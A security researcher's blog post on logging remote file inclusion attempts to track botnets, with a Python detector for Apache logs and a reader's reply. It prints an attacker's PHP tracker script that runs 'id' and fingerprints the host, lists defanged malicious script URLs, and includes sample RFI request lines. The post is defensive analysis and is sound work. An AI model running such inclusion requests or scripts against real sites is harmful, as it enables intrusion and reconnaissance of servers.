Quick RFI Analysis
by Jose Nazario

I've started collecting RFI (remote file inclusion) attempts, logging the attacking IP and the URL the attacker is trying to include. I started doing this because I'm looking for certain botnets and the tools they use, which aren't accessible any other way, and this seems to be an under-studied corner of botnet tracking. Most of the time what I find are little "tracker" scripts, used to mark a site as worth coming back to. They have modest AV detection and often look like this:
<?php
// Tracker script as seen in the RFI attempts. Behaviour is unchanged; it is
// only indented, wrapped in PHP tags and commented here. It fingerprints the
// host and prints a "was here" marker the attacker can grep for.
function ConvertBytes($number) {
    // Crude size formatter keyed on the number of digits, not the value.
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

// Host fingerprint: kernel, the user the web server runs as, and disk usage
// of the current directory.
echo "Osirys<br>";
$un = @php_uname();
$id1 = system('id');   // original used the bare word id; quoted so it parses on current PHP
$pwd1 = @getcwd();
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;

// The marker line, followed by the fingerprint. Everything is echoed into the
// victim's page, so the attacker reads it straight from the HTTP response.
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
0sirys is a very common handle in the scripts I'm finding.

So far, since the 15th, when I started actually storing these logs, I've seen the following countries hosting RFI scripts. It's no surprise that the US dominates, given how much web hosting is there:

The US also dominates by number of scanning IPs, the hosts trying to exploit a web app:

Discovering these is pretty easy: a few regex filters over the Apache logs, followed by some simple processing and storage in a database. So far the most popular scripts I've seen injected are these:
hxxp://fasttorrent.org//admin/x/copyright.txt
hxxp://redwoodtv.co.uk/images/fx29id1.txt
hxxp://www.gm-immobilien.info/components/com_id/fx29id
hxxp://www.vust.net/contrex/id1.txt
hxxp://www.tos-belarus.org/scan/copyright.txt
hxxp://203.114.112.155/webboard1234/1.jpg
hxxp://ballermarketing.com/article_directory/includes/id.txt
hxxp://i0.co.kr/i0mall//admin/idxx.txt
hxxp://www.thedead.se/vnc/fx29id.txt
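The regex-over-Apache-logs step described above, written out as an added example (this is not the author's own tooling). It assumes Apache's default combined LogFormat, flags any query parameter whose value is a remote URL, keeps the attacker's trailing "?" padding as a confidence signal, and stores the hits in SQLite so the included URLs and the scanning IPs can be counted. The log lines in SAMPLE_LOG are constructed for illustration and use documentation addresses.

```python
"""
Pull RFI attempts out of Apache "combined" access logs and tally them.

Added example, not the author's own tooling: it assumes Apache's default
combined LogFormat and treats any query parameter whose value is a remote
URL as an inclusion attempt. SAMPLE_LOG is constructed for illustration.
"""
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit

# LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# A parameter value that is itself a remote URL is the RFI signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample: two tracker fetches with the '?' padding, a benign page,
# a redirect parameter legitimately carrying a URL, and a repeat scanner.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jan/2009:03:21:10 +0000] "GET /index.php?page=http://example.net/x/id1.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [15/Jan/2009:03:22:41 +0000] "GET /components/com_foo/foo.php?mosConfig_absolute_path=http%3A%2F%2Fexample.org%2Fscan%2Fcopyright.txt%3F HTTP/1.1" 404 221 "-" "Mozilla/4.0"
192.0.2.4 - - [15/Jan/2009:03:23:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.5 - - [15/Jan/2009:03:23:02 +0000] "GET /redirect.php?url=http://example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2009:03:25:17 +0000] "GET /forum/index.php?lang=http://example.net/x/id1.txt? HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
"""


def extract_rfi(log_text):
    """Return one record per query parameter carrying a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format or malformed; skip it
        query = urlsplit(m.group('path')).query
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too.
        for param, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_RE.match(value):
                continue
            # Attackers pad the URL with '?' (often '??') so whatever the
            # vulnerable script appends to the path ends up in the query string
            # of their server instead of breaking the fetch. Its presence is a
            # strong signal; its absence is not proof of innocence.
            hits.append({
                'ip': m.group('ip'), 'ts': m.group('ts'),
                'status': int(m.group('status')), 'param': param,
                'url': value.rstrip('?'),  # normalised so one script counts once
                'truncated': value.endswith('?'), 'ua': m.group('ua'),
            })
    return hits


def store(hits, conn):
    """Persist hits in SQLite; returns the row count after insertion."""
    conn.execute("CREATE TABLE IF NOT EXISTS rfi (ip TEXT, ts TEXT, status INTEGER, "
                 "param TEXT, url TEXT, truncated INTEGER, ua TEXT)")
    conn.executemany("INSERT INTO rfi VALUES (?, ?, ?, ?, ?, ?, ?)",
                     [(h['ip'], h['ts'], h['status'], h['param'], h['url'],
                       int(h['truncated']), h['ua']) for h in hits])
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM rfi").fetchone()[0]


def top_included(conn, limit=10):
    """Most frequently included URLs, as (url, count) pairs."""
    return conn.execute("SELECT url, COUNT(*) AS n FROM rfi GROUP BY url "
                        "ORDER BY n DESC, url LIMIT ?", (limit,)).fetchall()


def top_scanners(conn, limit=10):
    """Most active attacking IPs, as (ip, count) pairs."""
    return conn.execute("SELECT ip, COUNT(*) AS n FROM rfi GROUP BY ip "
                        "ORDER BY n DESC, ip LIMIT ?", (limit,)).fetchall()


def analyze(log_text, db_path=':memory:'):
    """Run the whole pipeline; returns (hits, top urls, top scanner ips)."""
    conn = sqlite3.connect(db_path)
    hits = extract_rfi(log_text)
    store(hits, conn)
    return hits, top_included(conn), top_scanners(conn)


if __name__ == '__main__':
    hits, urls, ips = analyze(SAMPLE_LOG)
    for h in hits:
        print(('??' if h['truncated'] else '  '), h['ip'], h['param'] + '=' + h['url'])
    print('top included:', urls)
    print('top scanners:', ips)
```

The fourth sample line shows the caveat: a redirect or proxy parameter that legitimately carries a URL trips the same filter, so hits without the trailing "?" padding deserve a look before they go into a blocklist. The list above uses hxxp as a defanging convention; the real requests carry http://, which is what the filter matches.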
It looks like a simple marker of success rather than an agent. Defense against these sorts of attacks is usually all about keeping the web scripts updated; AV is rarely ever involved. On the PHP side, leaving allow_url_include off (the default since PHP 5.2) removes the include-from-URL primitive these attempts depend on. But this appears to be a growing problem in the botnet community, and one that won't go away soon without a solid, widely adopted solution.
Hi Jose, I've written a Python script to attract the RFI scanner. After answering the echoes, they send the bot, which could be analyzed. Your findings are very common.
Greetings, Lukas